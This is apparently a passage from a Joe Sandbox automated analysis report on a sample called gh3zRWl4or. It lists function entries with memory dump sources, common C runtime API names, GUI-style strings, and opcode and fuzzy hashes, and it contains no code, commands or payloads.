                                                                                                                                                                            • Part of subcall function 00007FF674159C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159CFA
                                                                                                                                                                            • Part of subcall function 00007FF674159250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159352
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415AC8B
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415ACA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$ceilffloorfmalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 573317343-0
                                                                                                                                                                          • Opcode ID: fd60ed0ee14cae937050ec17bd871febf5e8869ee0f0ffa18e8cf13fa6505315
                                                                                                                                                                          • Instruction ID: 948262d76f8d23e82f2adc74fb35e226798549ad0ab9f423d94021399867b93e
                                                                                                                                                                          • Opcode Fuzzy Hash: fd60ed0ee14cae937050ec17bd871febf5e8869ee0f0ffa18e8cf13fa6505315
                                                                                                                                                                          • Instruction Fuzzy Hash: B7129E33A18B94CAE311DB35D0856BDB7B4FB59784F158326EE88A3654EF38E591CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: powf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3445610689-0
                                                                                                                                                                          • Opcode ID: 28a52f2aea4df51de67c91a752e2ac190132dc141f7f38c8bb211a4c0276d771
                                                                                                                                                                          • Instruction ID: dc56781a1acd42e6b77c554b4fcd1a023197f878ceb6894a8ea21ffa63cd17a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 28a52f2aea4df51de67c91a752e2ac190132dc141f7f38c8bb211a4c0276d771
                                                                                                                                                                          • Instruction Fuzzy Hash: 16412A12F3CB8DC6E813A236844A8B9DA416F6A7C8E59D731E94E71791EF2971D28400
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: #SCROLLX$#SCROLLY
                                                                                                                                                                          • API String ID: 0-350977493
                                                                                                                                                                          • Opcode ID: 397ffeaf7c2789e22e8512bf2d05284fd49d185ef52bdc1364574c939d58788f
                                                                                                                                                                          • Instruction ID: 3a9352855e342266107d3719d13d1e3cc499cb9ab16b4e03a299fd90a2dc69b2
                                                                                                                                                                          • Opcode Fuzzy Hash: 397ffeaf7c2789e22e8512bf2d05284fd49d185ef52bdc1364574c939d58788f
                                                                                                                                                                          • Instruction Fuzzy Hash: F412A633D28BC9C5E212DA3790821B9A750EF7E385F29DB22FD4576566EF24B0D18A00
                                                                                                                                                                          Strings
                                                                                                                                                                          • - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X , xrefs: 00007FF674160BDD
                                                                                                                                                                          • ..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF674160BFC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X $..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
                                                                                                                                                                          • API String ID: 0-4293514333
                                                                                                                                                                          • Opcode ID: a7d38f3f62ff8bfd67a45ae15bd1ff51b11bb5f0e607d24480194b862b9088d6
                                                                                                                                                                          • Instruction ID: ac279449fddcb50fabfc6f3762eb34a53b88bb1c387c68d328999cb1a022a88c
                                                                                                                                                                          • Opcode Fuzzy Hash: a7d38f3f62ff8bfd67a45ae15bd1ff51b11bb5f0e607d24480194b862b9088d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 80D1F9237046D88AD754CF29D8D5A7C7B9AE794B02B4AC176CE89C27A1EF7AC445C310
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: [ ]$[x]
                                                                                                                                                                          • API String ID: 0-3323218928
                                                                                                                                                                          • Opcode ID: 7d1f5bebd3bdd2173c26a1258794a74af714770ce53c5b7c8410b9957697f27c
                                                                                                                                                                          • Instruction ID: c66eb23bdde0984a424f87243891a88622701bd54b408db9d344f6e7869a28d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d1f5bebd3bdd2173c26a1258794a74af714770ce53c5b7c8410b9957697f27c
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DE1BA33928B89C5E202DB3694451F9B350EF6E384F199731EE58665A5EF39E181CB00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: VUUU$VUUU
                                                                                                                                                                          • API String ID: 0-3149182767
                                                                                                                                                                          • Opcode ID: 94f68fb84e9e26c3f901f418bed6d1ac69c7780fc4c902d537ac8bd508fc21a0
                                                                                                                                                                          • Instruction ID: c6afd95a32336b50c32c2b09be77f258583542e0a1eac2672f008f6f1f3c845f
                                                                                                                                                                          • Opcode Fuzzy Hash: 94f68fb84e9e26c3f901f418bed6d1ac69c7780fc4c902d537ac8bd508fc21a0
                                                                                                                                                                          • Instruction Fuzzy Hash: C7C19833F10B48D9E301DB3A94815F9B361FBAA7C87159326FA0CB7665DF24A191DB80
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3061335427-0
                                                                                                                                                                          • Opcode ID: 094c4577826582de8072b8e25cab6100b37588a436b1f070e5cbc0b8248b82f4
                                                                                                                                                                          • Instruction ID: d1ccc85bb704d4ffdafdbf4edf82695d5c5dee8479c2cff6cc0b7d6d39a7b672
                                                                                                                                                                          • Opcode Fuzzy Hash: 094c4577826582de8072b8e25cab6100b37588a436b1f070e5cbc0b8248b82f4
                                                                                                                                                                          • Instruction Fuzzy Hash: F3910433A3968586DB51DB3AD1447B9B760FF9A785F14C732DE09A2665EF38E081CB00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ##Combo_%02d
                                                                                                                                                                          • API String ID: 0-4250768120
                                                                                                                                                                          • Opcode ID: 86e125e50d47379d23e63026dd9fd58ba356b17d31c862a95a60beeedbcba928
                                                                                                                                                                          • Instruction ID: 5a3d531922a58c0bad3813116b2eccef94633497106d5c12abd471c82b83472e
                                                                                                                                                                          • Opcode Fuzzy Hash: 86e125e50d47379d23e63026dd9fd58ba356b17d31c862a95a60beeedbcba928
                                                                                                                                                                          • Instruction Fuzzy Hash: 8142D433A28B85C6E711DB36D0851F9B770FF99384F149331EA58666A5EF38E095CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                          • Opcode ID: 6aadec4f857d5d084191e53991da83ecc8b905e14562a21ad55b440e16278cf2
                                                                                                                                                                          • Instruction ID: 3f4c9ad53d5e5dde8fa1dc257c089fa348c21bae0850ad94d5a7129f8704d8e4
                                                                                                                                                                          • Opcode Fuzzy Hash: 6aadec4f857d5d084191e53991da83ecc8b905e14562a21ad55b440e16278cf2
                                                                                                                                                                          • Instruction Fuzzy Hash: ED426E72B14B85C6E710DF2AD4846A977B1FB88B84F159232DE4D97B24DF3AE445CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                          • Opcode ID: 378f4455e9e26e8388d4f334d1afdd9bb43e036087f9d150b14874c7a3fd2b47
                                                                                                                                                                          • Instruction ID: 15e6991dfa88fcb834d9ce600241e85ab496855537d240253612a1e26b3f80ca
                                                                                                                                                                          • Opcode Fuzzy Hash: 378f4455e9e26e8388d4f334d1afdd9bb43e036087f9d150b14874c7a3fd2b47
                                                                                                                                                                          • Instruction Fuzzy Hash: B4614D6363C6E283D3565B3CA5892BDAED0B789388F1C9275FA8AC2B45CD3CD540C640
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                          • Opcode ID: 9b73806cbc492d3e3f50a07f843d09ae469a58cafdc72022189914457e6024f1
                                                                                                                                                                          • Instruction ID: 9fb5fe5e2709372ab8f72e72521714632b35817b83f6a8a6940ef805c66a69f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b73806cbc492d3e3f50a07f843d09ae469a58cafdc72022189914457e6024f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 49610673B6C6E1C6D7158B38B449AB9FFA4E789388F098275DA8CC3A45DE2ED101C700
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9b058f77c85996c0b3430052bb7bbe077e4bd92fd96da202169b27b6a568691a
                                                                                                                                                                          • Instruction ID: 81c43f07619edf8d4cac97c2151cadcf56c46e7c264d01ab88023f993f0e527a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b058f77c85996c0b3430052bb7bbe077e4bd92fd96da202169b27b6a568691a
                                                                                                                                                                          • Instruction Fuzzy Hash: A8B26633D28789C6E356AE3680C42F9B750EF59B8CF1D9735DE086A295EF3865C48B10
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 770b59ab0495df15d9417504e3538a6b35212834e34e299191476f775964e986
                                                                                                                                                                          • Instruction ID: be88fc883ac6c1854e36bd421ea129aa9fea049e9066445851e370d0ae50dbcb
                                                                                                                                                                          • Opcode Fuzzy Hash: 770b59ab0495df15d9417504e3538a6b35212834e34e299191476f775964e986
                                                                                                                                                                          • Instruction Fuzzy Hash: 4822D733E28785C6E753AE3690C52F9B790EF15B84F1A8735DE0DA7295EF28A4C4C610
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a3dabebd7bb958130e0a94b4efa8d972984d75d83799f2a0b86c621e863bf461
                                                                                                                                                                          • Instruction ID: ad62c3dd565ee6bf0ffdef0a6caf5307b886f76eba8e743d69d7c223cf1f0801
                                                                                                                                                                          • Opcode Fuzzy Hash: a3dabebd7bb958130e0a94b4efa8d972984d75d83799f2a0b86c621e863bf461
                                                                                                                                                                          • Instruction Fuzzy Hash: 44F19623D38B8D85E212A63754861F9F250AFBF384F1DEB22FD48B59B1DF2861D19600
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 73c53623bd2a0969440657ea732904c6b443514a47c12ff5a2f219424bd0e784
                                                                                                                                                                          • Instruction ID: 706d39fcef1d8f8e8e38e0a37b03101930074c14df33aa4287c768d25e07c456
                                                                                                                                                                          • Opcode Fuzzy Hash: 73c53623bd2a0969440657ea732904c6b443514a47c12ff5a2f219424bd0e784
                                                                                                                                                                          • Instruction Fuzzy Hash: BED1A633C2879DC5E252A63B50C61B8B390AF7E3D9F1DDB32E948B21E1DF2975859600
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
